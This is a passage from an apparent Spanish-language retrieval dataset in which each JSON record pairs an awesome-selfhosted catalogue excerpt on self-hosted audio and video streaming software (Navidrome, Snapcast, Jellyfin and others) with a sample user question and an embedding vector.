-0.04103, -0.06085, -0.02725, 0.02921, -0.01117, -0.02129, 0.0154, -0.02518]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: koel β€” Personal music streaming server that works [MIT, PHP]. LibreTime β€” Broadcast streaming radio on the web (fork of [Airtime](https://github.com/sourcefabric/Airtime)) [AGPL-3.0, Docker/PHP]. LMS β€” Access your self-hosted music using a web interface [GPL-3.0, Docker/deb/C++]. Lyrion Music Server β€” Server software which controls a wide range of Squeezebox/Slim Devices audio players and compatible hardware (formerly Logitech Media Server) [GPL-2.0, deb/Docker/Perl]. moOde Audio β€” Audiophile-quality music playback for the wonderful Raspberry Pi family of single board computers [GPL-3.0, PHP]. Mopidy β€” Extensible music server. Offers a superset of the mpd API, as well as integration with 3rd party services like Spotify, SoundCloud etc [⚠, Apache-2.0, Python/deb]. mpd β€” Daemon to remotely play music, stream music, handle and organize playlists. Many clients available [GPL-2.0, C++]. mStream β€” Music streaming server with GUI management tools. Runs on Mac, Windows, and Linux [GPL-3.0, Nodejs].", "indexar": "con que programa puedo montar un servidor de streaming musical de alta calidad en Raspberry Pi?", "v": [-0.04295, 0.0053, -0.13384, -0.2209, -0.10717, -0.12233, -0.01261, -0.11248, -0.06262, -0.11337, 0.07979, -0.03019, 0.14923, -0.11158, 0.09166, 0.00545, 0.00624, 0.00301, 0.15576, 0.0554, 0.01179, -0.02287, -0.01264, 0.02243, 0.00439, 0.06544, 0.10628, 0.02125, -0.06959, 0.05064, 0.10039, 0.0236, -0.02398, -0.08478, -0.08997, -0.06267, 0.04151, 0.09307, -0.00606, -0.03224, -0.00771, -0.06979, -0.04647, 0.02373, 0.02016, -0.00158, 0.15306, 0.0304, 0.05372, 0.00644, 0.04192, 0.05548, -0.07633, 0.0596, 0.03404, -0.00075, -0.02012, -0.21689, 0.0695, -0.0592, -0.06486, -0.03477, -0.10509, -0.04208, 0.0257, -0.05088, -0.00547, 0.02098, -0.08957, 0.02235, -0.03703, -0.06591, -0.00723, -0.0205, 0.06703, 0.0982, -0.07233, -0.09166, 0.12523, -0.02443, 0.02526, -0.02484, 0.02256, 0.15111, -0.06517, -0.08749, 0.02536, -0.07966, 0.08354, 0.08475, 0.05821, 0.13972, -0.01134, 0.09192, 0.05781, -0.06546, 0.16859, 0.03224, 0.08664, 0.02858, -0.00919, 0.09211, -0.04184, 0.02919, 0.0664, 0.11095, 0.13364, -0.03859, 0.0822, 0.02308, -0.02081, 0.03384, -0.1197, -0.01952, -0.09229, -0.14604, -0.01423, -0.00241, -0.00608, 0.06496, -0.01676, 0.03608, 0.04324, -0.00385, 0.06405, -0.00337, 0.03486, 0.0412, -0.01883, 0.00492, 0.00506, -0.03482, 0.01212, -0.03207, 0.02453, -0.10045, 0.04837, -0.08603, 0.01946, -0.00304, 0.07641, 0.03088, 0.02247, -0.04583, 0.08273, -0.08512, 0.05896, -0.10851, -0.00295, 0.07746, -0.01741, 0.10831, -0.05465, -0.02642, -0.09281, 0.01771, -0.01204, -0.00664, -0.03983, 0.05004, 0.02246, 0.01468, -0.01821, 0.00844, 0.03377, 0.01016, 0.01554, 0.07234, 0.09918, 0.01427, -0.10942, 0.05216, 0.0031, -0.09645, -0.05356, -0.01924, -0.09442, -0.08148, 0.07275, 0.00536, -0.09271, 0.02907, -0.01866, 0.03317, -0.04776, -0.02923, -0.04092, -0.00442, -0.00493, -0.00891, 0.05015, 0.00689, -0.05683, 0.07353, 0.08212, -0.03114, -0.07954, -0.04654, -0.01044, -0.02527, -0.04296, -0.07565, -0.05751, -0.03503, 0.02436, -0.03898, -0.01467, 0.01899, 0.01371, 0.07128, -0.00031, -0.04254, 0.07337, -0.04292, -0.0345, -0.03436, 0.02309, -0.00328, 0.00527, 0.02422, -0.06078, 0.02989, 0.0609, 0.05685, -0.0157, -0.01375, 0.0447, 0.02395, 0.05445, 0.02699, -0.06101, 0.03377, 0.02245, -0.03791, 0.00497, -0.03119, 0.02788, -0.01128, -0.03702, -0.06523, 0.02609, 0.09138, -0.00094, -0.05309, -0.01785, -0.03161, -0.03533, 0.0547, 0.02754, -0.00329, -0.02854, -0.01604, -0.01629, -0.02679, 0.02403, 0.01717]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: multi-scrobbler β€” Scrobble plays from multiple sources to multiple scrobbling services [MIT, Nodejs/Docker]. musikcube β€” Streaming audio server with Linux/macOS/Windows/Android clients [BSD-3-Clause, C++/deb]. Navidrome Music Server β€” Modern Music Server and Streamer, compatible with Subsonic/Airsonic [GPL-3.0, Docker/Go]. Pinepods β€” Podcast management system with multi-user support. Pinepods utilizes a central database so aspects like listen time and themes follow from device to device [GPL-3.0, Docker]. Polaris β€” Music browsing and streaming application optimized for large music collections, ease of use and high performance [MIT, Rust/Docker]. Snapcast β€” Synchronous multiroom audio server [GPL-3.0, C++/deb]. Stretto β€” Music player with Youtube/Soundcloud import and iTunes/Spotify discovery [⚠, MIT, Nodejs]. Supysonic β€” Python implementation of the Subsonic server API [AGPL-3.0, Python/deb].", "indexar": "con quΓ© puedo escuchar mΓΊsica en varias habitaciones de forma sincronizada?", "v": [-0.07975, 0.12538, -0.10939, -0.00843, -0.10609, -0.05795, -0.14399, 0.03008, 0.00348, -0.15337, 0.00438, -0.06087, 0.07842, -0.03436, 0.10887, -0.05872, 0.06337, 0.03177, -0.00237, 0.05365, -0.0292, -0.08905, -0.02414, 0.07662, -0.10433, -0.02996, 0.10305, 0.04838, -0.06447, 0.05339, 0.03046, 0.00036, 0.03625, -0.031, -0.06054, -0.03984, 0.07301, 0.143, 0.01007, 0.0489, -0.0804, -0.0079, 0.00149, 0.02508, 0.04695, -0.07667, -0.04209, 0.04429, -0.0093, 0.0742, 0.03271, 0.08565, -0.02076, 0.02088, 0.09125, -0.13045, 0.00103, -0.12116, 0.05852, -0.01027, -0.01697, 0.04073, 0.02293, 0.05468, 0.0817, 0.08485, 0.06407, 0.02815, 0.08688, 0.04252, -0.08828, 0.00963, 0.02309, 0.01472, 0.06124, 0.09705, -0.0805, -0.11502, 0.0031, -0.02036, 0.03108, 0.01397, -0.04873, -0.02055, -0.1489, 0.09029, 0.12876, 0.06796, -0.07366, 0.0436, -0.02051, 0.05888, -0.00499, 0.02579, 0.05482, -0.04313, -0.00094, 0.05625, 0.01894, -0.03208, 0.04029, -0.0122, -0.02024, 0.00179, 0.03775, 0.08618, 0.05527, -0.1069, 0.12545, 0.04126, -0.09285, 0.07498, -0.06334, -0.05684, -0.0502, -0.12013, -0.02476, -0.03041, 0.05179, 0.06949, -0.00613, 0.00271, -0.03633, -0.02622, -0.01521, -0.03051, 0.0248, -0.01365, 0.09484, 0.00828, 0.01941, -0.01272, 0.0398, -0.12354, 0.09394, -0.04755, -0.05787, -0.0473, 0.06017, -0.01072, 0.12723, 0.10931, -0.0229, -0.02176, 0.02143, -0.06434, 0.01315, -0.03228, -0.07587, -0.00552, -0.02522, 0.07785, -0.07581, -0.08623, -0.04393, 0.0675, 0.07077, -0.07528, -0.01139, -0.01212, -0.06472, 0.0498, -0.02035, -0.0107, 0.03753, -0.05567, 0.02294, 0.00466, -0.02111, -0.04782, -0.13643, -0.04593, 0.10551, -0.048, -0.17951, -0.1176, -0.12096, -0.05034, 0.11341, -0.04576, -0.09476, 0.01299, -0.10214, -0.07489, 0.07271, -0.0376, -0.0022, -0.03887, -0.09728, -0.06449, -0.01323, -0.00099, -0.04586, 0.05684, 0.03526, -0.02625, -0.02689, 0.03771, -0.10051, 0.03175, -0.08498, -0.07185, -0.0481, -0.07688, 0.09783, 0.00318, -0.05702, 0.02712, -0.00065, 0.00412, 0.03428, -0.06353, -0.01953, 0.05886, -0.02268, -0.01735, -0.0192, -0.01532, -0.04021, 0.04044, -0.0383, 0.08075, 0.14623, -0.01502, 0.00358, 0.04087, 0.03226, -0.00372, 0.06712, 0.06668, -0.05245, 0.08469, 0.00158, 0.04627, -0.02495, 0.04565, -0.05315, 0.01784, -0.05876, 0.00052, 0.05908, 0.06916, -0.00571, -0.03573, 0.03004, -0.05851, -0.03239, 0.02388, 0.00166, -0.04167, -0.03079, 0.04704, 0.05998, -0.00549, 0.09, 0.03541]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: multi-scrobbler β€” Scrobble plays from multiple sources to multiple scrobbling services [MIT, Nodejs/Docker]. musikcube β€” Streaming audio server with Linux/macOS/Windows/Android clients [BSD-3-Clause, C++/deb]. Navidrome Music Server β€” Modern Music Server and Streamer, compatible with Subsonic/Airsonic [GPL-3.0, Docker/Go]. Pinepods β€” Podcast management system with multi-user support. Pinepods utilizes a central database so aspects like listen time and themes follow from device to device [GPL-3.0, Docker]. Polaris β€” Music browsing and streaming application optimized for large music collections, ease of use and high performance [MIT, Rust/Docker]. Snapcast β€” Synchronous multiroom audio server [GPL-3.0, C++/deb]. Stretto β€” Music player with Youtube/Soundcloud import and iTunes/Spotify discovery [⚠, MIT, Nodejs]. Supysonic β€” Python implementation of the Subsonic server API [AGPL-3.0, Python/deb].", "indexar": "quΓ© servidor me sirve para escanear automΓ‘ticamente mis reproducciones en diferentes plataformas?", "v": [0.11809, 0.11156, -0.16707, -0.08016, -0.01618, -0.11383, -0.00946, -0.22492, -0.03338, -0.03267, -0.11091, -0.0338, 0.03819, -0.0733, 0.09235, 0.07175, 0.15284, -0.07856, 0.08694, 0.0981, 0.01896, -0.02558, 0.01866, -0.10424, -0.0915, -0.00983, 0.0338, -0.00404, -0.20261, -0.04897, -0.03063, 0.09695, 0.06165, -0.03255, -0.04574, -0.09678, 0.03857, 0.07775, -0.0695, 0.00018, 0.03112, 0.00013, -0.07845, -0.02727, 0.0172, -0.01846, 0.03514, 0.01345, 0.03427, 0.04086, -0.08497, -0.03447, -0.12737, 0.05676, -0.02809, -0.0055, 0.12164, -0.14666, 0.0943, 0.00476, -0.17327, 0.01794, 0.05103, -0.06945, 0.05171, 0.06157, -0.01565, -0.01936, 0.01231, 0.03042, -0.08948, 0.06336, 0.09492, -0.07304, 0.01275, 0.06211, -0.02424, -0.02104, 0.01651, 0.10352, 0.09, 0.008, -0.11027, 0.12115, -0.00922, -0.03418, 0.02424, -0.06229, 0.08344, -0.022, 0.03838, 0.01357, -0.03914, 0.10217, 0.04247, -0.08606, 0.10889, -0.07313, -0.02273, 0.00023, 0.02877, -0.02859, -0.02603, 0.05616, -0.06454, 0.10211, 0.08514, -0.12251, -0.01052, -0.04111, 0.06595, 0.01044, -0.05821, 0.00149, -0.07246, -0.0062, -0.00433, 0.04517, 0.09503, 0.08234, -0.05621, -0.05581, 0.0594, 0.00489, 0.04573, -0.07486, 0.02288, 0.03613, 0.0063, -0.01026, -0.03993, -0.0853, -0.08396, -0.02736, -0.00191, -0.03348, 0.11283, -0.03618, -0.01987, -0.06799, 0.07654, 0.06753, -0.0218, -0.02799, 0.08367, -0.01751, 0.11418, -0.17147, -0.00582, -0.02115, -0.0074, -0.02748, -0.06112, 0.02092, -0.10722, -0.03814, 0.01786, -0.07668, -0.11577, 0.11224, 0.01723, -0.00455, 0.02588, 0.07247, -0.01117, -0.0308, -0.02737, 0.03204, 0.00841, 0.04557, -0.00572, 0.07454, 0.03106, -0.127, 0.004, -0.02483, -0.0646, -0.03741, 0.01216, 0.00973, -0.06079, -0.01086, -0.01678, 0.00267, -0.0095, -0.06092, -0.02086, -0.05792, 0.00463, 0.0952, 0.01173, 0.01653, -0.08356, 0.00045, 0.02511, -0.05333, -0.03515, -0.03419, -0.01012, -0.04392, -0.02412, -0.01411, -0.00482, -0.01274, 0.00673, 0.00401, -0.00984, -0.02226, 0.05612, 0.02486, -0.04919, 0.01395, 0.10818, -0.02662, -0.00018, -0.04117, 0.08835, -0.08464, -0.01188, -0.05839, -0.02601, -0.02064, 0.03527, 0.0144, -0.06213, 0.11552, 0.03468, -0.00791, 0.06455, -0.01426, -0.04332, 0.00886, -0.0616, -0.0091, 0.00898, -0.05856, 0.01344, -0.05351, -0.05165, -0.07026, -0.01523, 0.04232, 0.00464, -0.05404, 0.00251, -0.08579, 0.00275, -0.01638, -0.05792, -0.00158, -0.03735, -0.02356, 0.00691, -0.02053, 0.01042, -0.00044]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: multi-scrobbler β€” Scrobble plays from multiple sources to multiple scrobbling services [MIT, Nodejs/Docker]. musikcube β€” Streaming audio server with Linux/macOS/Windows/Android clients [BSD-3-Clause, C++/deb]. Navidrome Music Server β€” Modern Music Server and Streamer, compatible with Subsonic/Airsonic [GPL-3.0, Docker/Go]. Pinepods β€” Podcast management system with multi-user support. Pinepods utilizes a central database so aspects like listen time and themes follow from device to device [GPL-3.0, Docker]. Polaris β€” Music browsing and streaming application optimized for large music collections, ease of use and high performance [MIT, Rust/Docker]. Snapcast β€” Synchronous multiroom audio server [GPL-3.0, C++/deb]. Stretto β€” Music player with Youtube/Soundcloud import and iTunes/Spotify discovery [⚠, MIT, Nodejs]. Supysonic β€” Python implementation of the Subsonic server API [AGPL-3.0, Python/deb].", "indexar": "cual es una alternativa libre a Spotify para tener un sistema propio de streaming y gestiΓ³n de podcasts?", "v": [0.02403, 0.05376, -0.10537, -0.15676, -0.0248, -0.10729, -0.05561, -0.20522, -0.01861, -0.04207, -0.08555, -0.04749, -0.02428, -0.06684, -0.00865, -0.06733, 0.14307, -0.07736, 0.08521, 0.02222, -0.04073, 0.01532, -0.04545, -0.08557, 0.10986, -0.00443, 0.16442, 0.02976, -0.14971, 0.04429, -0.03844, -0.04238, -0.00191, -0.01884, -0.15076, -0.01194, 0.06676, 0.19237, -0.01459, -0.02278, 0.04216, -0.07629, 0.04178, 0.0825, -0.03835, -0.01846, -0.03751, 0.04629, 0.00487, 0.07671, -0.04835, -0.02178, -0.0748, 0.11448, 0.06756, -0.0575, -0.0229, -0.26592, -0.04469, -0.02546, -0.12715, 0.02601, -0.01044, -0.06832, -0.01497, 0.03918, -0.04722, 0.07212, -0.07259, 0.16884, -0.02677, -0.09958, 0.0242, 0.02516, 0.07059, 0.09989, -8e-05, -0.08524, 0.04137, -0.00749, 0.08093, -0.15555, 0.03136, 0.08612, -0.08008, 0.04661, 0.0435, -0.02444, -0.0288, 0.0794, -0.06009, -0.01157, 0.01396, 0.08867, -0.00466, -0.04068, 0.09526, -0.06703, -0.00851, -0.05323, -0.00656, 0.06985, -0.07779, 0.02392, -0.00153, 0.04785, 0.00236, -0.08421, 0.01554, 0.07207, -0.05209, 0.04343, -0.02652, 0.00677, -0.05123, -0.06111, -0.0126, -0.05589, 0.01604, 0.00254, -0.03506, -0.00624, -0.0159, -0.1096, 0.0475, 0.0249, 0.02272, 0.04187, 0.03258, 0.00964, 0.10181, -0.02809, -0.06675, -0.11187, -0.00342, -0.10155, -0.01045, 0.02224, 0.0017, 0.0134, -0.01837, 0.06193, -0.00553, -0.02665, 0.06497, -0.14315, 0.0194, -0.11585, 0.01442, -0.03982, -0.07366, 0.07368, -0.13015, -0.04017, -0.00083, 0.0095, -0.01266, -0.10468, -0.0614, 0.01664, 0.04205, -0.05826, -0.00607, -0.01401, -0.00944, 0.00159, 0.0607, 0.02337, -0.00339, -0.04088, -0.06134, 0.06884, 0.05204, -0.078, -0.03216, -0.10474, -0.01071, -0.10255, 0.13384, -0.01386, -0.10422, 0.00455, -0.03023, -0.04641, -0.0461, -0.01277, -0.03831, -0.03432, -0.06793, 0.06508, -0.01234, 0.01438, -0.05196, 0.01975, 0.06946, 0.02555, -0.03675, -0.08883, -0.0932, 0.04994, -0.08773, -0.02003, 0.01917, -0.00599, 0.00107, -0.02186, -0.00039, -0.0035, 0.06823, 0.06285, 0.0334, 0.00547, 0.04328, 0.01441, -0.0615, -0.02521, 0.00409, -0.0146, 0.00076, 0.01582, -0.0088, 0.03514, 0.05117, -0.0141, 0.00838, 0.051, 0.03406, 0.01918, -0.00715, -0.02036, -0.01987, -0.02886, 0.03241, 0.03914, 0.02067, -0.03366, -0.00602, 0.04163, -0.04968, -0.02961, -0.00359, 0.10155, 0.02102, 0.02348, 0.00324, -0.01164, -0.06022, 0.02341, -0.014, -0.04307, -0.04232, 0.02133, 0.02694, 0.01732, 0.04508, -0.00973]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: SwingMusic β€” Swing Music is a beautiful, self-hosted music player and streaming server for your local audio files. Like a cooler Spotify ... but bring your own music [MIT, Python/Docker]. vod2pod-rss β€” Convert YouTube and Twitch channels to podcasts, no storage required. Transcodes VoDs to MP3 192k on the fly, generates an RSS feed to use in podcast clients [⚠, MIT, Docker].", "indexar": "que programa puedo usar para escuchar mΓΊsica local de forma auto-alojada y bonita?", "v": [-0.03027, 0.08986, -0.1763, -0.06211, -0.05833, -0.03439, -0.12897, -0.04062, -0.04993, -0.15483, -0.02813, -0.0988, 0.03527, 0.02414, -0.03493, -0.11619, 0.10939, -0.08372, -0.00208, -0.02453, 0.02967, -0.0152, -0.08166, 0.0683, -0.02959, 0.07765, 0.16167, 0.00491, -0.01727, 0.06972, 0.07025, 0.01346, 0.09112, -0.02499, -0.10135, -0.04863, 0.09899, 0.00526, 0.04181, -0.02581, -0.05233, 0.02374, 0.00475, 0.02178, 0.04917, 0.03525, 0.02789, 0.0411, -0.12029, 0.05025, 0.01226, 0.03889, -0.01935, 0.00735, 0.13707, -0.11174, 0.03172, -0.17721, -0.07332, -0.04422, -0.0395, -0.03058, -0.0475, 0.07933, 0.09924, 0.01245, 0.1703, 0.05388, -0.00118, -0.01624, -0.06715, -0.02283, 0.12882, 0.00866, 0.04232, 0.02008, -0.09531, -0.04029, 0.06045, -0.03668, -0.0148, -0.01356, 0.00114, 0.04135, -0.11116, 0.09639, 0.14917, -0.02219, -0.07775, 0.04689, -0.09782, 0.04273, 0.05322, 0.05582, 0.01918, -0.04779, 0.02706, 0.08129, 0.05396, -0.00811, 0.09166, -0.09567, 0.00203, 0.01751, 0.07758, 0.05358, 0.09265, -0.08034, 0.11894, 0.08367, -0.05283, 0.04872, -0.06339, -0.05391, -0.02512, -0.07835, 0.02961, -0.01802, 0.0266, -0.00137, -0.00299, 0.07634, -0.00698, -0.00546, 0.00592, -0.02883, -0.01199, 0.06672, -0.00519, 0.06088, 0.06519, -0.02815, 0.04956, -0.1247, 0.03079, -0.08493, -0.02331, -0.0611, 0.02336, 0.04917, 0.11353, 0.1154, -0.02559, 0.00913, 0.04562, -0.05972, -0.01567, -0.0476, 0.01418, -0.0111, 0.0064, 0.03344, -0.07117, -0.04662, -0.05209, 0.025, 0.12699, -0.06401, 0.01419, -0.04306, -0.10132, 0.03422, -0.04461, -0.0227, 0.04388, -0.05528, 0.04662, 0.04427, 0.07613, -0.05751, -0.04644, 0.02438, 0.09462, -0.08107, -0.11063, -0.0676, -0.05838, -0.06906, 0.08794, -0.00462, -0.1038, 0.02245, -0.051, -0.00127, 0.02525, -0.00923, -0.02059, -0.02501, -0.07745, -0.09131, -0.03613, 0.00156, -0.01611, 0.03692, 0.06265, 0.01362, -0.03551, 0.0385, -0.10367, 0.05145, -0.12598, -0.09169, -0.06093, -0.08426, 0.08084, 0.05959, -0.06099, -0.00775, 0.03801, 0.06825, 0.00972, -0.05656, -0.00146, 0.06753, -0.01791, -0.0224, -0.02764, 0.03064, -0.01962, 0.0677, -0.01077, 0.05591, 0.10235, 0.03656, 0.00329, 0.02539, 0.04781, -0.02328, 0.05951, 0.05069, -0.0407, 0.03315, -0.0146, -0.01649, -0.01972, 0.00931, -0.0748, 0.00691, -0.05962, -0.04049, 0.03546, 0.11137, 0.01654, -0.06068, 0.00519, -0.02129, -0.04594, 0.00648, 0.02648, -0.01704, -0.02679, 0.02384, 0.05589, 0.00426, 0.08859, 0.07977]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: SwingMusic β€” Swing Music is a beautiful, self-hosted music player and streaming server for your local audio files. Like a cooler Spotify ... but bring your own music [MIT, Python/Docker]. vod2pod-rss β€” Convert YouTube and Twitch channels to podcasts, no storage required. Transcodes VoDs to MP3 192k on the fly, generates an RSS feed to use in podcast clients [⚠, MIT, Docker].", "indexar": "existe alguna herramienta que convierta canales de YouTube en podcasts sin guardar archivos?", "v": [0.13454, 0.01379, -0.02613, -0.11761, -0.0497, -0.09928, 0.0203, -0.00681, 0.01948, -0.14842, -0.07227, -0.0984, -0.02907, 0.06314, -0.06965, 0.04098, 0.18526, -0.0253, 0.10501, -0.04349, -0.00374, 0.0226, -0.07674, -0.05076, 0.01368, -0.0466, 0.02264, 0.02137, -0.08464, 0.0143, -0.08286, 0.05342, -0.00413, 0.04372, -0.19943, -0.0085, 0.03592, 0.11397, -0.14299, 0.00292, -0.06516, 0.08334, -0.05674, 0.07604, -0.09588, 0.00781, -0.03852, -0.00074, -0.02762, 0.05363, 0.01693, -0.06971, -0.14541, 0.09245, -0.00527, -0.13308, 0.03382, -0.13432, -0.02817, -0.06873, -0.07686, -0.0126, 0.06815, -0.01923, -0.01282, 0.06043, -0.01514, 0.06003, -0.13631, 0.11101, -0.11731, 0.02126, 0.01954, 0.07752, 0.06493, 0.06871, 0.01353, -0.01614, -0.0331, 0.03733, 0.03065, -0.12393, 0.08302, 0.00667, -0.09571, -0.02685, 0.01085, -0.03054, -0.0628, -0.13817, -0.07253, 0.09344, 0.06003, 0.04715, 0.01443, -0.0421, 0.09496, -0.03296, -0.02851, -0.13718, 0.02511, 0.05654, -0.04486, 0.08881, 0.05718, 0.14628, 0.00598, -0.11065, 0.01305, 0.08968, 0.04926, 0.13623, 0.0371, -0.0243, -0.07895, 0.04491, -0.01606, -0.11853, -0.03205, -0.01423, 0.09702, 0.0529, -0.09702, -0.04, 0.0225, 0.04951, 0.001, 0.05016, 0.02921, -0.00849, 0.06839, -0.01938, -0.01579, -0.01428, 0.02872, -0.06223, 0.04918, 0.00217, -0.07337, -0.05445, 0.05513, -0.01644, -0.03446, -0.04233, 0.07593, -0.04983, -0.01224, -0.12719, -0.1252, -0.04143, 0.00231, -0.01423, -0.10968, -0.08086, 0.0441, 0.05521, -0.0037, -0.14355, -0.08758, 0.01818, 0.05075, -0.06775, 0.01386, -0.10605, -0.01666, -0.04841, 0.02957, 0.08826, -0.0161, -0.03291, 0.02721, 0.05497, 0.05967, -0.09875, -0.08291, -0.04788, -0.00673, 0.01474, 0.14127, -0.04609, -0.08433, 0.00133, 0.03657, 0.00504, -0.01133, -0.06848, -0.00223, -0.02174, -0.08416, 0.05086, -0.03759, -0.01691, -0.04934, 0.00756, 0.06787, 0.00306, -0.04918, -0.05768, 0.02061, 0.037, -0.06798, -0.06122, 0.02931, 0.01899, -0.02611, 0.008, -0.0484, -0.04849, 0.02349, 0.02198, -0.00484, -0.06429, -0.03888, -0.02955, -0.00414, -0.03084, 0.01669, 0.06472, -0.00026, 0.05514, 0.02695, 0.00617, 0.03041, -0.06135, -0.00836, 0.08406, 0.01483, -0.01119, -0.02964, -0.04014, -0.0201, -0.02611, -0.01313, 0.01778, 0.01518, -0.00399, 0.01673, 0.02881, -0.03168, 0.01595, -0.04801, 0.05238, 0.04226, 0.03439, 0.00692, 0.00929, -0.01825, 0.06584, -0.01226, -0.05919, 0.03338, 0.03468, 0.02205, 0.01084, 0.04454, -0.02657]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: SwingMusic β€” Swing Music is a beautiful, self-hosted music player and streaming server for your local audio files. Like a cooler Spotify ... but bring your own music [MIT, Python/Docker]. vod2pod-rss β€” Convert YouTube and Twitch channels to podcasts, no storage required. Transcodes VoDs to MP3 192k on the fly, generates an RSS feed to use in podcast clients [⚠, MIT, Docker].", "indexar": "cual es una alternativa libre a Spotify para reproducir mi propio audio desde el servidor?", "v": [0.01021, 0.08454, -0.18389, -0.06539, -0.05054, -0.12207, -0.07851, -0.22246, -0.05742, -0.03685, -0.03024, -0.10341, 0.05748, -0.07555, 0.05922, -0.07413, 0.16555, -0.09122, 0.08064, 0.06593, 0.01519, 0.03673, -0.02474, -0.09705, 0.06691, -0.02295, 0.1594, 0.03863, -0.14261, 0.02362, 0.02004, -0.00153, 0.02638, -0.05521, -0.09965, -0.03185, 0.07298, 0.16936, 0.01139, -0.02, 0.09392, -0.10895, -0.02229, 0.09681, -0.07875, -0.01442, 0.01559, -0.02412, 0.026, 0.09925, 0.02599, -0.00096, -0.09521, 0.07369, 0.01834, -0.00224, 0.06147, -0.25326, 0.01645, -0.07906, -0.10754, 0.00406, -0.01894, -0.06907, 0.02398, 0.05094, -0.01504, 0.00334, -0.04215, 0.10695, -0.09481, -0.03718, -0.00302, -0.02816, 0.04702, 0.11604, -0.07354, -0.17973, 0.02755, -0.02461, 0.05755, -0.13601, 0.00865, 0.03847, -0.06113, 0.00661, 0.05584, -0.01865, 0.01214, 0.10304, -0.05634, 0.03571, -0.0175, 0.12338, 0.00386, -0.08827, 0.12781, -0.03648, -0.01962, -0.01027, 0.0736, 0.06192, -0.05828, 0.01256, 0.02945, 0.0582, 0.03752, -0.09869, 0.05068, 0.05348, -0.01443, 0.01075, -0.04824, 0.0192, -0.0509, -0.07419, -0.02373, -0.004, 0.08401, 0.07049, -0.04076, -0.00667, -0.02358, -0.06671, -0.05523, 0.00039, 0.0174, -0.00319, -0.00413, -0.02803, 0.08914, 0.01016, -0.0429, -0.11747, -0.02342, -0.04276, 0.0503, -0.06444, 0.00991, 0.01494, 0.05719, 0.02857, -0.03877, -0.01566, 0.08282, -0.06241, 0.04224, -0.0761, 0.02407, -0.00206, -0.07467, 0.04733, -0.10153, 0.00844, -0.05023, 0.0427, 0.01906, -0.09561, -0.05811, 0.05734, 0.02489, -0.01404, 0.02067, 0.02928, 0.04245, 0.0279, 0.02767, 0.00189, 0.01765, -0.02625, -0.11033, 0.01996, 0.05092, -0.08315, -0.03933, -0.10591, -0.02871, -0.10292, 0.11082, 0.00865, -0.04243, 0.03525, -0.0912, -0.03805, -0.03225, -0.04388, -0.02235, -0.02522, -0.06181, 0.03557, -0.02963, -0.00086, -0.03527, 0.03263, 0.04873, -0.03813, -0.06222, -0.08797, -0.12236, 0.02476, -0.0616, -0.02233, -0.04476, -0.02492, 0.04503, -0.04449, -0.03697, 0.02125, 0.02858, 0.03445, 0.01879, 0.02258, 0.07509, 0.04126, -0.05945, -0.00226, 0.03722, -0.0629, -0.00195, 0.00593, 0.0116, 0.05224, 0.05906, -0.01153, -0.02782, 0.03301, 0.02849, -0.00201, 0.03434, 0.02669, -0.02218, 0.04448, -0.01071, 0.00753, 0.02363, -0.00088, -0.01838, -0.00452, -0.03266, -0.04281, 0.036, 0.08772, -0.03618, -0.00783, -0.0045, -0.05503, -0.04258, 0.00096, -0.036, -0.03976, -0.0143, 0.02123, 0.06776, -0.03638, 0.03148, -0.02686]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: ClipBucket β€” Start your own video sharing website (YouTube/Netflix Clone) in a matter of minutes [AAL, Docker/PHP]. cmyflix β€” Minimalist Plex/Jellyfin alternative to stream video [AGPL-3.0, C/deb]. Gerbera β€” UPnP Media Server, which allows you to stream your digital media throughout your home network and listen to/watch it on a variety of UPnP compatible devices [GPL-2.0, Docker/deb/C++]. Icecast 2 β€” Streaming audio/video server which can be used to create an Internet radio station or a privately running jukebox and many things in between [GPL-2.0, C]. Jellyfin β€” Media server for audio, video, books, comics, and photos with a sleek interface and robust transcoding capabilities. Almost all modern platforms have clients, including Roku, Android TV, iOS, and Kodi [GPL-2.0, C#/deb/Docker].", "indexar": "que programa es una alternativa libre a Plex para ver videos en casa?", "v": [-0.06148, 